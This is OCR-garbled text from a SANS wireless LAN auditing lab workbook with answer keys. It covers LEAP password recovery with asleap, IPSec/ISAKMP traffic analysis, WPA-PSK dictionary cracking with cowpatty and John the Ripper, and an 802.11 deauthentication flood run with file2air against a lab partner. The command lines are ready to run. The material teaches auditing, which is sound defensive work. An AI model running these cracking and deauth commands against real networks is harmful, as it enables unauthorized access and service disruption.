leapexch?.dump -f words.dat -n words. idx asleap 1.4.2 - actively recover LEAP/PPTP passwords. Using the passive attack method. Closing pean ... ? In this case, the asleap tool did not attempt to recover the password from the LEAP transaction supplied in the capture file. We can increase the verbosity of information reported by asleap by adding the "-v" parameter, as shown below: # asleap -r leapexch?.dump -f words.dat -n words.idx -v asleap 1.4.2 - actively recover LEAP/PPTP passwords. Using the passive attack method. Captured LEAP challenge: 0802 7500 000a 8247 d253 0040 9658 2058 ..u....G.8.8.x X 0040 9658 2058 90c8 asaa 0300 0000 B86e .8.x x. 0100 0017 Oler a017 1101 0008 1671 Sdc2 .... cbs e73£ 6174 7261 6765 T2ff EFEE FE 1... 2atrager. Captured LEAP 0801 3201 0040 9658 2058 000a 847 d253, 0040 9658 2058 c091 aaaa 0300 0058 Babe 0100 0027 02ef 0027 1101 0018 Sbf4 fdc2 Jdfd 4a0a 96d3 3c23 e762 Gaza 3523 6295 6174 7261 6765 72£f FFEE FE Using the passive attack method. Captured LEAP exchange information: username OFS\jnovak challenge: £622£5c4b0115c27 response 322039638c506a67a65c80316a346e7£598560046127£607 hash bytes: be5b Could not find a matching NT hash. Try expanding your passw list I've given up. Sorry it didn't work out. Closing peap t Question: What can we deduce about the authentication architecture of the network from the username in the leapexci3.dump capture? Question: What prevented asieap from discovering the password in this file? In this exaniple, asleap was unable to identify the password for the user "DOFS\jnovak". This is because the password for this user was not present in the input dictionary file supplied to the genkeys tool. We can expand the dictionary file supplied to genkeys to include more potential passwords and reassess this transaction, if desired. ‘Assess the LEAP exchange contents in the "leapexch4.dump" capture file, and answer the questions that follow. Question: Was asleap able to recover the password from the LEAP exchange in the Teapexch4.dump capture? Question: What kind of policies would be required to mitigate the recover of weak LEAP passwords? Question: How could an administrator enforce this kind of a policy?This completes our 8" lab exercise. Congratulations. ©Answers Section 8.1.1 Question; How many packets are returned from this new filter? Answer: 114 packets. Question: What additional information is included in this packet display? Answer: EAPOL start, success and key distribution frames are also displayed with the “eapol" display filter. Section 8.1.2 Question: What is the MAC address of the access point? Answer: The AP is at 00:40:96:58:20:58 Question: What is the MAC address of the station? Answer: The station MAC is 00:0a:8a:47:d2:53 Question: What is the username of the authenticating user? Answer: The username is "atrager" Question: What is wrong with the "Peer Challenge" in frame 213? Answer: The "Peer Challenge" is actually the 24-byte peer response and is not a "random value" as Wireshark indicates, Question: How does the client correctly identify the identity of the access point in the last 2 frames of the five-way handshake? Answer: The client forces the AP to pass a challenge/response authentication to ensure it is a legitimate access point and not an imposter. Section 8.2.1 ‘Question: How many hashes/second was your system able to generate? ‘Answer: This will vary depending on the performance of your system. Section 8.2.2 Question: Was asleap able to recover the username and password included in the Jeapexch] dump LEAP transaction? Answer: Yes Ques ‘Answer: "password" ion: What was the password reported by asleap? 8-10Question: Does the calculated last 2 bytes of the NTLM hash displayed on the “hash bytes:" line of the asleap output match the last two bytes of the actual user password hash? Answer: Yes, both values are 0x586c ine the information that is reported by asleap in verbose reporting mode - ics of this capture file would cause asleap to not attempt to recover the user's password? Answer: The authentication failed so Asleap does not attempt to recover the password, Question: What can we deduce about the authentication architecture of the network from the username in the leapexch3.dump capture? Answer: The authentication architecture is likely a Windows environment where "DOFS" is the Windows domain name. Question: What prevented asleap from discovering the password in this file? Answer: The user's password was not in the input dictionary file. Question: Was asleap able to recover the password from the LEAP exchange in the leapexch4.dump capture? Answer: Yes, the password is "flounder" Question: What kind of policies would be required to mitigate the recover of weak LEAP passwords? Answer: A strong password selection policy is required. Question: How could an administrator enforce this kind ofa policy? Answer: By rejecting user's password that are weak and regularly auditing password selection with tools like Asteap. 8-11This page intentionally left blank.Lab 9 - Auditing VPN/Segmented Networks Complete the exercises in this lab to reinforce the material covered in the Auditing VPN/Segmented Networks module. To complete these exercises, you will need the lab files includes on the SANS Wireless LAN Auditing Lab CD.Lab 9-1: Identifying IPSec Traffic Purpose: Introduce the techniques used to identify ISAKMP traffic from a supplied capture file Description: In this lab we'll use a supplied capture file with mixed networks and extract, traffic that identifies the presence of IPSec traffic. We'll look for the presence of the ISAKMP protocol, UDP-tunneled traffic and identify the method used for ISAKMP negotiation, 9.1.1. Connected to the Classroom Network Execute the following commands from a shell prompt to connect to the SANS- ROGUEO! network: # killall dhoped # iwconfig wlan0 essid SANS-ROGUEO1 enc off mode managed # dheped -d wland At this point, your system should be connected to the SANS-ROGUEOI network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance. 9.1.2. Assessing ISAKMP Traffic Using the “lab9capture.dump" capture file from the lab CD, we can examine sample ISAKMP traffic. Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button. Open the capture file for this lab by clicking "File > Open" navigate to the /imp/lab9 folder and select the “labStraffic.dump" capture file Next, apply a display filter that will display only ISAKMP traffic. (Hint: Use the protocol field name) (Hint: Use all lower-case letters) (Hint: The display filter should return 20 packets) (Hint: “isakmp")Select the first ISAKMP frame with the source address "172.16.0.99". This is the client system that is initiating the ISAKMP negotiation with the VPN server. Notice that Wireshark has identified this frame as "Aggressive" in the Info column. Expand the fields in the protocol dissector view and answer the following questions. Note that this file has been modified from its original form; ervors indicating invalid checksums can be safely ignored Question: What IP protocol is used for ISAKMP traffic? Question: What source port and destination port are used for ISAKMP traffic? Question: What field identifies the ISAKMP frame as "Aggressive"? Question: What is the supported enéryption mechanism for this client system in transform payload number 10?) (Hint: Expand the security association (SA) payload) (Hint: Expand the proposal payload #1) (Hint: Expand the transform payload #10) Question: What is the identified authentication mechanism in transform payload number 10? ‘Question: What is the identified hashing algorithm mechanism in transform payload number 10? Next, select the first frame with the source address "192.168.254.254", ‘This is the VPN server system that is responding to the ISAKMP negotiation request with its supported capabilities. Answer the following questions relating to the capability information of this device. Question: What is the supported encryption protocol for this VPN server? (Hint: Expand the ISAKMP payload) 7 (Hint: Expand the security association (SA) payload) (Hint: Expand the proposal payload #1) (Hint: Expand the transform payload #10) Question: What is the supported hashing algorithm for this VPN server? Question: What is the supported authentication mechanism for this VPN server? ‘As we can see from this ISAKMP exchange, we can determine several factors about the IPSec server and client systems including the supported encryption mechanisms, hashing mechanisms and authentication mechanisms. 9-3Recall from the material that Aggressive mode ISAKMP negotiation shortens the exchange to three frames but exposes identity information. Expand the identification payload information to reveal additional details about the IPSec server. Question: What is the reported protocol and port information in the identification payload? Question: What does the identification data represent? Note that the IP address identified in the identification data represents the actual IP address of the VPN server. The "192.168.254.254" IP address reflects the NAT address from a firewall protecting the VPN server but does not prevent the server from disclosing its intemal IP address. This can give the attacker additional information about the characteristics of the network that can be valuable in other attacks. Next, remove the display filler to reveal additional capture information in this trace. Scroll to the traffic that follows the ISAKMP negotiation and answer the questions that follow. Question: What LP protocol is used to encapsulate IPSec traffic following the ISAKMP negotiation? Question; What port number is used for the upper-layer traffic encapsulation protocol? ‘Question: What is the likely vendor associated with the port number used for traffic encapsulation? 9.1.3. Assessing Traffic with EtherApe EtherApe is a great example of a powerful open-source tool that has a wide vatiety of uses, From the perspective of auditing wireless networks, Etherape is useful in characterizing traffic on the network, including the ability to identify traffic patterns that can characterize the use of a VPN server for wireless network security. Note: At the time of this writing, EtherApe recognizes a limited number of network encapsulation methods. For this reason, EtherApe cannot graph the activity on the wireless network unless the station is connected to the wireless network. Future versions of this tool may support monitoring the network while in RFMON mode as wellFirst, start EtherApe by clicking "K > Backtrack > Sniffers > EtherApe". Backtrack will start EtherApe with the first interface name it recognizes which is "Io". This produces an error as shown: @ Link type not yet supported EtherApe unsupported link type error Click OK to acknowledge this error. Next, click "Capture > Interfaces > wlan0” to select the wireless card as the monitoring data source. EtherApe will immediately begin to graph the activity on the network, identifying active hosts and protocols. Since the wireless network is a shared medium, EtherApe can observe all traffic on the network and document it accordingly. The default configuration of EtherApe is to graph activity from hosts in the "instant iew", where the hosts that are currently communicating the most are indicated with thick interconnecting lines, as shown below. This doesn't provide us with a strong overall sense of the activity on the network, since the interconnecting lines only indicate the current bandwidth utilization on the network. ie ow > . re [Reading dalam wara nF moue EtherApe screen using the instant view for traffie representation 9-5We can change the behavior of EtherApe to change the size of the node to reflect accumulated traffic, Select the preferences icon on the EtherApe screen and change the "Node size variable" option to "Accum. traffic (In+Out)", as shown below. Click OK to close the preferences window. [fSesren car [Names [canine] Protocol Sct. Level Diag ree eh pero’ (ne) ‘opmost cognzad protocol, #j [ooo a Nooe sie vanable Diagram Node Timeout (ns) Accum, tate (nwouy | [60000 < Skee Mow near = Max Node Radius ©) Hide rode rams Bs croup uct pots as. Link With (a Node a iasing a ee Save vi Bonly |X cancel EtherApe preferences dialog box. Question: What characteristic of node traffic indicates a host that is transmitting and receiving a significant amount of traffic? Question: What characteristics would indicate the presence of a VPN server on the wireless network? Work with a lab partner to generate traffic on the wireless network, noting the corresponding activity in EtherApe, From an XTerm, use different tools such as ping, nmap and netcat to generate traffic. For example, working with a partner you can designate a client and a server to transfer files with netcat as shown below (initiate the server before the client). Create a 10 MB file of random data then establish a netcat server to transfer the file. root@1(root]# dd if=/dev/urandom bs=1024 count=10000 of-data 10000+0 records in 1000040 records out 10240000 bytes transferred in 5.869933 seconds (1744483 bytes/sec) root@1(root]# 1s -1 data wewer--r-- 1 root root 10249000 Sep 21 07:53 data root@l[root]# ne -1 -n -vwv -p 18000 data (OWKNOMM) [10.0.0.104) 18000 (biimenu) open sent 0, revd 10240000 oc root@1|root]# Press "CTRL/C" on the client to end the transfer once EtherApe indicates the file transfer has completed. You may need to reduce the maximum node size in the EtherApe options if there is too much traffic on the network to recognize different transactions. Repeat this procedure using different file sizes and different port numbers. Which hosts generate the greatest amount of traffic on the network? This completes our 9"" lab exercise. Congratulations. ©Answers Section 8.1.2 Question: What IP protocol is Answer; UDP Question: What source port and destination port are used for ISAKMP traffic? sed for ISAKMP traffic? Answer: Source and destination port 500 are used. Question: What field identifies the ISAKMP frame as "Aggressive"? Answer: The ISAKMP exchange type has a value of 4 indicating an aggressive mode exchange, Question: What is the supported encryption mechan payload number 10?) Answer: Triple DES-CBS mode (3DES-CBC). Question: What is the identified authentication mechanism in transform payload number 10? sm for this client system in transform Answer: XAUTHinitPreShared, or pre-shared key authentication. Question: What is the identified hashing algorithm mechanism in transform payload number 10? Answer; MDS Question: What IP protocol is used to encapsulate IPSec traffic following the ISAKMP negotiation’? Answer: UDP Question: What is the reported protocol and port information in the identification payload? Answer: Port 500 Question: What does the identification data represent? Answer: The identification data "staf?" indicates the group name that is being used for the pre-shared key authentication, Question: What port number is used for the upper-layer traffic encapsulation protocol? Answer: 10,000 for source and destination port to encapsulate traffic for NAT. Question: What is the encapsulation? Answer: Port 10,000 is commonly used for ISAKMP-NAT encapsulated traffic with Cisco equipment. ly vendor associated with the port number used for trafficLab 10 - Auditing WPA/PSK Networks ‘Complete the exercises in this lab to reinforce the material covered in the Auditing WPA/PSK Networks module, To complete these exercises, you will need the lab files includes on the SANS Wireless LAN Auditing Lab CD. 10-1Lab 10-1: Auditing WPA/PSK Networks i ntroduce the techniques used to identify and audit WPA/PSK networks. Description: In this lab we'll use a supplied capture file with mixed networks and extract traffic that identifies the presence of IPSec traffic. We'll look for the presence of the ISAKMP protocol, UDP-tunneled traffic and identify the method used for ISAKMP f negotiation. 10.1.1. Assessing WPA/PSK Traffic Using the supplied capture files on the lab CD, we can examine sample traffic from WPAVPSK networks. Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button, Open the capture file for this lab by clicking "File > Open", navigate to the /tmp/lab10 folder and select the "JablOcapture1.dump" capture file. Next, apply a display filter that will display only beacon frames. (Hint: Select the frame type/subtype field of a beacon frame) (Hint: The display filter should return 73 frames) (Hint: The display field name is “wlan. fe.type_subtype") (Hint: The type/subtype for beacon frames is "8") (Hint: "wlan.fe.type_subtype = 8") Next, select a beacon frame and expand the tagged management parameters tree. Inspect the tagged management parameters, and answer the questions that follow. Question: What is the SSID for this network? Question: What is the encryption protocol used for unicast traffic on this network? Question: What is the encryption protocol used for multicast traffic on this network? Question: What is the authentication method used for this network? By inspecting the information in beacon frames, we can identify the encry mechanism in use for WPA networks, as well as the authentication mecha 10-2have determined that this network uses TKIP and a pre-shared key (PSK) for authentication, let's inspect the information in the four-way handshake. 10.1.2. Identifying the Four-Way Handshake Using the "lab | Ocapture! dump" file, apply a filter to display only EAPOL traffic, (Hint: Clear the existing display filter to display all packets) (Hint: Look at the information displayed in the "Protocol" field for a display name) (Hint: Look at frame number 43) (Hint: The display filter should return four frames) (Hint: "eapol") After applying the display filter, select the first EAPOL frame and expand the "802.1x Authentication” protocol dissector tree, as shown below. Te eh ue @ tee foe Ga Ge BibPB* eS Berl VF SAQA tor view of 802.1x authentication data Wireshark protocel diss: 10-3The four frames displayed by Wireshark represent the four-way TKIP exchange. Inspecting the 802.1x authentication information in the first frame (frame number 43), we can see the reported nonce information Question: Is the first frame in the TKIP four-way handshake from the supplicant or the authenticator? (Hint: Inspect the frame control flags) (Hint: Is from DS or to DS set?) (Hi i: Compare the source address to the BSSID) Since the source address matches the BSSLD, we can see determine that the first frame is from the AP, initiating the four-way handshake. Note that the MIC field in the first part of the four-way handshake is al! 0's, since the AP does nat have enough information to calculate the PTK that is required to identify the MIC key to calculate the MIC of this frame. Next, select the second frame in the four-way handshake. This frame includes an additional nonce value that represents the supplicant nonce, since itis transmitted from the wireless station, Note that the MIC value is present in this frame, since the supplicant has enough information to calculate the PTK (authenticator address, supplicant address, authenticator nonce and now the supplicant nonce). Note that the "WPA Key’ field in part two of the four-way handshake includes the capability information of the client system. In case, the capability information matches what is advertised in the beacon frames (TKIP protocol, WPA-PSK for authentication). ‘This information can be helpful in troubleshooting clients that are not successfully completing the four-way handshake, due to incompatible cipher suites and authentication methods. Next, select the third frame in the four-way handshake, Now that the AP has the supplicant nonce value, it can calculate the PTK and verify the MIC value transmitted from the supplicant in part two of the four-way handshake. Between frames two and three, the AP verifies the supplicant's PMK (and by extension, the PSK) by comparing the observed MIC in part two of the four-way handshake with the calculated MIC of the same frame. Ifthe observed and calculated MIC's match, the AP issues part three of the four-way handshake, effectively informing the client station that they have suecessfully authenticated Next, select frame four of the four-way handshake. This frame acknowledges the receipt and content of the third frame, but provides little in the way of authentication since both stations have already exchange knowledge of the PTK. 10-410.1.3. Auditing the PSK ‘Now that we have examined the details of the four-way handshake and the information that is exchanged, we can take a look at the process of auditing the PSK with a dictionary attack. In this fashion, an auditor can capture traffic from WPA-PSK networks and mount an offline dictionary attack to identify weak and poorly selected PSK's. First, open two XTerm windows. In the first window, run the too! “top” to monitor the performance of your system. The output of top will took similar to the example provided below. # top top - 14:21:20 up 3:38, 1 user, load average: 0.00, 0.07, 0.06 Tasks: 27 total, 1 running, 26 sleeping, 0 stopped, 0 zombie Cpu(s): 0.08 user, 0.08 system, 0.04 nice, 100.0% idle Mem: 254608k total, 108684k used, 140924k free, 19016 buffers Swap: 987988k totel, Ok used, 997990 free, 65208 cached PID USER PR NI VIRT RES SHR S SCPU SMBM © TIMB+ COMMAND 1 root 9 0 240 240 2128 0.0 0.2 04 init 2 root B 0 0 9 08 0.0 0.0 :00 keventd 4 root 29 0 0 0 8 0.0 0.0 00 ksward 5 root 3 0° 0 9 O8 0.0 0.0 +00 bdflush 6 root 2 0 0.9 08 0.0 0.0 +00 kupdated 11 root 5 09 0 9 08 0.0 0.0 +00 kreiserfsd 64 root 9 0 $92 592 5125 0.0 0.2 +00 syslogd 67 root 9 0 443 448 3925 0.0 0.2 :01 klogd 174 root 9 0 09 9 08 0.0 0.0 +00 khubd 206 root 9 0 $12 S12 4488 0.0 9.2 0:00.00 dhcped 1682 root 9 0 520 520 4645 0.0 0.2 0:00.00 inetd 1685 root 9 0 1384 13841292 s 0.0 0.5 0:00.00 sshd 1693 root 8 0 S564 564 4965 0.0 0.2 0:00.00 crond 1696 root 9 0 2116 2108 1548S 0.0 0.8 0:00.00 sendmail In this example, we can see the processor for the system is reported as 100% idle, At the end of this exercise, press "Q" to exit top. In the second XTerm window, change to the /tmp/lab10 directory as shown below. # cd /tmp/1ab10 # pwd /tmp/1ab10 His Jabl0capturel.dump abl0capture2.dump labl0capture3.dump words # 10-5Three packet captures from WPA-PSK networks have been supplied, along with a short list of dictionary words, Run the cowpatty tool from the current directory to see a list of avail options, as shown below. # cowpatty cowpatty 4.0 - WPA-PSK dictionary attack. cowpatty: Must supply a list of passphrases in a file with -f or a hash “Elle with -d. Use "-£ -" to accept words on stdin. Usage: cowpatty [options] -f£ Dictionary file -d Hash file (genpmk) -r Packet capture file -s Network SSID (enclose in quotes if SSID includes spaces) -h Print this help information and exit -v Print verbose information (more -v for more verbosity) -V¥ Print program version and exit ‘The cowpatty tool requires at least three command-line options: a list of dictionary words, a lidpeap-formatied packet capture containing the WPA-PSK four-way handshake and the network SSID. Note that all three of these parameters are required, and that the SSID must be specified in the proper case as it is seen on the network. Using the "lablOcapture dump" capture file, mount an attack against the PSK using the supplied dictionary file, as shown below, ‘The SSID for this capture file is "SANS". ‘While this command is running, examine the performance statistics reported by "top in the other XTerm window. 4 cowpatty -r labl0capturel.dump -f words -s SANS cowpatty 4.0 - WPA-PSK dictionary attack. Collected all necessary data to mount crack against passphrase. Starting dictionary attack. Please be patient. key no. 1000: adynamia :Question: What was the result of assessing the PSK with the cowpatty tool? Question: What is the PSK reported by cowpatty? Question: How many passphrases were tested with cowpatty? Question: How long did it take to recover the passphrase? ‘Question: How many words per second was your system able to test? Question: What was the relative CPU utilization of your system when running cowpatty? Question: What could be done to reduce the amount of time needed to test all the passwords in the supplied dictionary file using this tool? Next, mount a similar attack against the "lab 1Ocapture2.dump" capture file. You'll need to determine the SSID for the network by examining the contents of a beacon frame with Wireshark. Note also that the passphrase used for this capture file is NOT present in the dictionary file. Use the hints below to identify the PSK used for this eapture fie. (Hint: You can interactively try passwords one at a time with cowpatty by specifying a hyphen as the filename, as shown below. This causes cowpatty to accept passphrases from STDIN, or keyboard input.) (Hint: The company name is GNIP GNOP) (Hint: The PSK is a derivation of the company name) (Hint: The PSK is 8 characters in length) (Hint: The PSK was selected using common techniques for selecting "strong" passwords) ") for the lette (Hint: It is common for users to substitute a one i" and a zero ("0") for the letter "o") 4 cowpatty -z labl0capture2.dump -£ - ~s GNIPGNOPWLAN cowpatty 4.0 - WPA-PSK dictionary attack. Using STDIN for words. Collected all necessary data to mount crack against passphrase. Starting dictionary attack. Please be pat. gnip gnop gnipgnop gnipgadp The third capture file uses a PSK that is based on a modification of a dictionary word. Use John the Ripper in conjunction with cowpatty and the supplied word list to identify the password as shown below. Note that this attack will take a long time - be prepared 10-7for a busy system over an extended period of time while mounting this attack (it may take several days to complete, depending on the speed of your processor) # john -rules -wordlist:words -stdout | compatty -r lebl0capture3.dump ~£ - -s GNIPGNOPWLAN a In more recent versions of coWPA\tty, support for precomputed hash tables of PM's was added. Although each hash table is specific to a single SSID, they only have to be calculated once. ‘The final capture file is a four-way capture of a WPA2-PSK network using the very common SSID "linksys". Also supplied is the hash table "linksys.hash” which includes many popular passphrases and precomputed PMK information. instead of specifying the wordlist with the "-£" parameter, we reference a hash file that was generated with the "genpmk" tool included with coWPAtty. Recover the passphrase for the capture file "wpa2psk-linksys.dump", as shown below. } cowpatty -r wpa2psk-Linksys.dump -d linksys.hash -s linkeys + Question: How much time did it take to recover the passphrase of the final capture with the precomputed PMK data? This completes our tenth lab exercise. Congratulations. © 10-8Answers Section 10.1.1 * Question: What is the SSID for this network? Answer: "SANS" Question: What is the encryption protocol used for unicast traffic on this network? Answer: TKIP Question: What is the encryption protocol used for multicast traffic on this network? Answer: TKIP Question: What is the authentication method used for this network? Answer: PSK or pre-shared keys. Question: Is the first frame in the TKIP four-way handshake from the supplicant or the authenticator? Answer: The first frame is from the AP. Section 10.1.3 Question: What was the result of assessing the PSK with the cowpatty tool? Answer: The PSK was successfully recovered Question: What is the PSK reported by cowpatty? Answer: "avocation” Question: How many passphrases were tested with cowpatty? Answer: 4459 Question: How long did it take to recover the passphrase? Answer: 105 seconds on a Pentium Celeron 2 GHz system Question: How many words per second was your system able to test? Answer: 42.49 words/second Question: What was the relative CPU utilization of your system when running cowpatty? Answer: CPU utilization should be at nearly 100% utilization for the duration of the attack. Question: What could be done to reduce the amount of time needed to test all the passwords in the supplied dictionary file using this tool? Answer: Distributing the wordlist to multiple systems or increasing the processing capacity of the system would reduce the time needed to test all the passwords. 10-9This page intentionally left blank.Lab 11 — Denial of Service Attacks Complete the exercises in this lab to reinforce the material covered in the Denial of Service Attacks on Wireless Networks module. To complete these exercises, you will need the Backtrack Security Tools Linux CD and a supported wireless card, as included, in the SWAT toolkit.Lab 11-1: Demonstrating a Denial-of-Service Attack ” Purpose: This lab will provide attack against a wireless station. \ds-on experience on demonstrating a denial-of-service Description: In this lab exercise you will use the file2air utility to implement an 802.11 deauthentication fload attack against a partner station that is connected to the SANS- ROGUEDI classroom network. It is occasionally necessary to demonstrate the effectiveness of a denial-of-service attack, either in a consulting role or to demonstrate the effectiveness of such an attack to co- workers or management. This lab will provide the means necessary to implement such an attack. Please use this information wisely; it is not wise to launch denial-of-service attacks against networks that you are not authorized to attack. In order to complete this lab, you will need to work with a partner system. One system will follow the steps marked “[VICTIM]" and will be the target of the denial-of-service attack. ‘The second system will follow the steps marked "[ATTACKER]" to mount the DoS attack. You may optionally wish to switch roles after completing this lab so each person has the opportunity to attack another system, If it is more convenient to work in a group of three for this lab exercise, read the information in the ADDITIONAL EXERCISE section to have a third participant capture the DoS attack exchange with a sniffer like Wireshark. 11.1.1. [VICTIM] Connect to the classroom network ‘We will use the "SANS-ROGUEOI" network for connectivity that will be attacked. The SANS-ROGUEO! network is open and does not require a WEP key for authentication. Execute the following commands from a shell prompt to connect to the SANS- ROGUEO! network: ¥ killal1 dheped ¥ iwconfig wlan0 essid SANS-ROGUEO enc off mode managed ¥ dhoped -d wland At this point, your system should be connected to the SANS-ROGUED! network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance, 1-211.1.2. [VICTIM] Identify address information Next, the victim will identify client information that will be used by the attacker to target the attack. The information that is needed is the MAC address of the victim wireless card, the BSSID of the SANS-ROGUEOl access point, and the channel number. We can identify the MAC address of the wireless card by running the "ifconfig" utility, as shown below: f ifconfig wland wiand Link encap:Ethernet BWaddr 00:02:6F:33:8C:41 inet addr:172.16.0.101 Beast:172.16.0.255 Mask: 255.255.255.0 UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1 RX packets:43830 errors:0 dropped:20 overruns:0 feme:0 TX packets:1397 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txquevelen:0 RX bytes:3802819 (3.6 Mb) 1X bytes:818024 (798.8 Kb) Interrupt:10 Memory: e8362000-e836£000 The string following "HWaddr" in this output represents the MAC address of the wireless card. Write this address information in the space provide below. Next, use the "iwconfig" utility to identify the channel and BSSID information for the access point you are currently associated to, as shown below: # iwconfig wland wland TESE 802.1ib ESSTD:"SANS-ROGUEOI" Mode:Managed Frequency:2.462GHz Access Point: 2:76:38 Bit Rate:1iMb/s Sensitivity=1/3 Retry min limit:8 ff Fragment thr:off Power Management :off Link Quality:23/70 Signal level:-70 dBm Noise level:-94 dam Rx invalid awid:0 Rx invalid crypt:11 Rx invalid frag:0 ‘Tx excessive retries:0 Invalid misc:3663 Missed beacon:0 00:0F: 66:8 The string following "Access Point:" in this output represents the BSSID of the access point. Write this address information in the space provide below. The string following "Frequency:” indicates the frequency that is in use. We can convert this value to the channel number by using the chart provided below. Identify the channel number in use by matehing the frequency in the following chart: W-32.412 2.447 8 2417 2 2.452 9 2.422 3 2.457 10 2.427 4 2.462 i 2.432 5 2.467 12 2.437 6 2.472 1B 2.442 7 2.484 14 Use the following text-box to document the MAC address, BSSID and channel number for the victim station: Leer tny oh) Channel 11.1.3, [VICTIM] Ping a remote system In order to quickly identify when the victim station has lost network connectivity, initiate ‘a continuous ping to a remote system, as shown below: # ping -i 5 172.16.0.1 This command will ping the remote host at 172.16.0.1 every five seconds until itis interrupted by pressing CTRL/C. Leave the ping command running until the end of this, exercise. 11.1.4. [ATTACKER] Examine deauthenticate file contents In order to mount a deauthenticate attack, we need to transmit multiple deauthenticate frames onto the network. Weill use the file2air tool for this task, so we need a file that represents the packet will transmit into the network repeatedly. Change to the /tmp/lab! I directory and examine the contents of the file "deauth.bin". Since this is a binary file, we cannot view it with a simple ASCII editor. We can dump the hexadecimal contents of the file with the xxcd utility however, as shown below. # ed /tmp/labil # xxd deauth.bin 9000000: cO00 0000 9060 1af0 9168 OD s6D0_0082 1-4O0000I0: Odd Send oGar GOOD o200 God ae ¥ 1s -1 deauth.bin 1 root root 28 Apr 21 13:12 deauth.bin # ‘The deauth.bin file is small, only 28 bytes. The 28 bytes of this file represent a standard 802.11 management frame (24 bytes) with a 4-byte payload, ‘The leading Oxc0 byte indicates that this packet is a management frame, sub-type deauthenticate frame. The default MAC addresses identified in this packet will be overridden with command-line arguments with the file2air tool. 11.1.5. [ATTACKER] Introduction to file2air Next, run the file2air command with no command-line parameters to identify a list of available options, as shown below: # filevair filezair v1.ORCL - inject 802.11 packets from binary files filegair: Must specify -i and -£ Usage: file2air [options] “i --interface Specify an interface name vr --driver Driver type for injection “f --filename Specify a binary file contents for injection -c --channel Channel number a count Number of packets to send mw --delay Delay between packets (ux for usec or X for seconds) nt ne fast Alias for -w wi0000 (10 packets per second) nd --dest. Override the destination address -s ~-source Override the source address -b --bssid Override the BSSID address -g -=seqnum Override the sequence mmber (leading Ox for hex value) -p -=pieces Fragment the payload into X pieces. ch -help Output this help information and exit -v --verbose Print verbose info (more -v's for more verbosity) # The critical command-line options we are going to use for the DoS attack are detailed as follows: 1-5Command Argument (if any) Description option wland Interface name to use for transmitting packets o ng Driver name used for wlan0 interface f deauth.bin Binary file describing the packet to inject © ‘The channel number of the victim, refer to the chart above for the correct channel number a 100000 Number of packets to transmit before stopping ~~~ inject 10 packets per second, no argument necessary d Destination address to send packet to, refer to the chart above for the victim MAC address “s Source address to spoof, must be MAC address of the AP; use the chart above and specify the AP BSSID address b BSSID address to spoof, use the chart above and specify the AP BSSID address ‘Substitute the arguments in "" with the information collected from the victim station. Implementing the deauthenticate flood attack is very straightforward. Simple run the file2air command with the appropriate arguments, as shown below: *** NOTE: Double-check the channel number and MAC addresses before initiating the DoS attack. DO NOT mount a DoS attack against any stations other than your lab partner. *** # £ileQair -i wlan0 -r wlan-ng -f deauth.bin -c -n 100000 -t =d ~s ~b filegaiz vI.ORCL - inject 802.11 packets from binary files Transmitting packets ... This command will continue to execute for several minutes. Allow this cormmand to continue running while we retumn to examine the victim station. 11-611.1.6. [VICTIM] Examine victim connectivity results Retum to the victim station and examine the output from the ping command. The ping responses will stop incrementing while the attack is underway. After a minute or two, the ping command will present a "Destination Host Unreachable” error Note that it is possible for the victim station to occasionally transmit a ping packet and get a response while being attacked by the victim. This could be because the packets being transmitted by the victim are colliding with other traffic on the network and need to be retransmitted, or because the victim is limiting the attack to 10 deauthenticate frames per second. Examine the last several lines of output from the kernel logger by running the dmesg command, as shown below: # dmesg | tail -24 wifl0: TXEXC - statu: xetry_count=0 tx_rate=0 fc=0x0108 (Data?: 6:63:76: 3b A2=00:02:6f:33:be:41 A: 10:00:00 LinkStatus=1 (Connected) LinkStetus: BSSID=00:0f:66:03:76:3b LinkStatus=2 (Disconnected) LinkStatus: BSSID=00:0£:66:63:76:3b TXEXC - status*0x0004 ((Discon}) tx_control=000c Fe=0x0108 (Data?:0 Tops) 0004 ({Discon]) tx_contro! 0 Tops) FieCs£0: 00: e260 ‘A2000:02:6£:33:be:41 A3e£E: TEELEE (Connected) LinkStatus: BSSID=00:0£:66:e3:76:3b LinkStatus-2 (Disconnected) LinkStatus: BSSID=00:0f:66:¢3:76:3b wifiO: TXEXC - status=0x0004 ([Discon]) tx_contro! retry_counts0 tx_rates0 fo=0x0108 (Data?: 6:03: 76:36 A200: 02:6£:33:be:41 A: E:fE:£Es EE 10:00:00 LinkStatus=1 (Connected) LinkStatus: BSSTD=00:0f:66:e3:76:3b LinkStatus2 (Disconnected) LinkStatus: BSSTD=00:0f:66:e3:76:3b 0004 ([Discon}) tx contro fe=0x0108 (Data?:0 ToDS) 1 ABefEEE:EE: EE: £8262 ade LinkStatus=1 (Connected) LinkStatus: BSSID=00:0f:66:e3:76:3 LinkStatus=2 (Disconnected) LinkStatus: BSSTD=00:0f: 66:63:76: 3b "1-7TinkStatus-1 (Connected) LinkStatus: BSSTD=00:0f:66:e3:76:3b LinkStatus-2 (Disconnected) wifi0: LinkStatus: BSSID=00:0f: 66:63:76: 3b From this output, we can see that the Linux driver is reporting repeated connect and disconnect sessions, between receiving deauthenticate frames from the attacker. 11.1.7, [ATTACKER] Stop the DoS attack Return to the attacker's session and stop the DoS attack by pressing “CTRL cause file2air to stop gracefully, returning to the shell prompt. ‘This will 11.1.8. [VICTIM] Monitor connectivity Afier the attacker stops the DoS attack, the victim station should return to normal connectivity. Question: The victim station returns to normal operating mode when the attack is terminated. What kind of a DoS attack does this represent? 11.4.9. [VICTIM] Cleanup Stop the ping command by pressing "CTRLIC". 1-8ADDITIONAL EXERCISE If there is a third station available, consider using a tool like Wireshark to capture the DoS attack while it is underway. Examine the trace after completing the deauthenticate flood by applying a filter on the victim address: wlan.da eq 00:01:02:03:04:05 or wlan.sa eq 00:01:02:03 Where 00:01:02:03:04:05 is the MAC address if the victim station. What does the cfient system attempt to do when it receives a deauthenticate frame? Is there a way we can determine if the deauthenticate frame was transmitted by an access point or by an attacker? This completes our 1 1"" lab exercise. Congratulations. © 11-9Answers Section 11.1.9 Question: The victim station retums to normal operating mode when the attack is, terminated, What kind of a DoS attack does this represent? Answer: A deauthenticate flood is an example of a 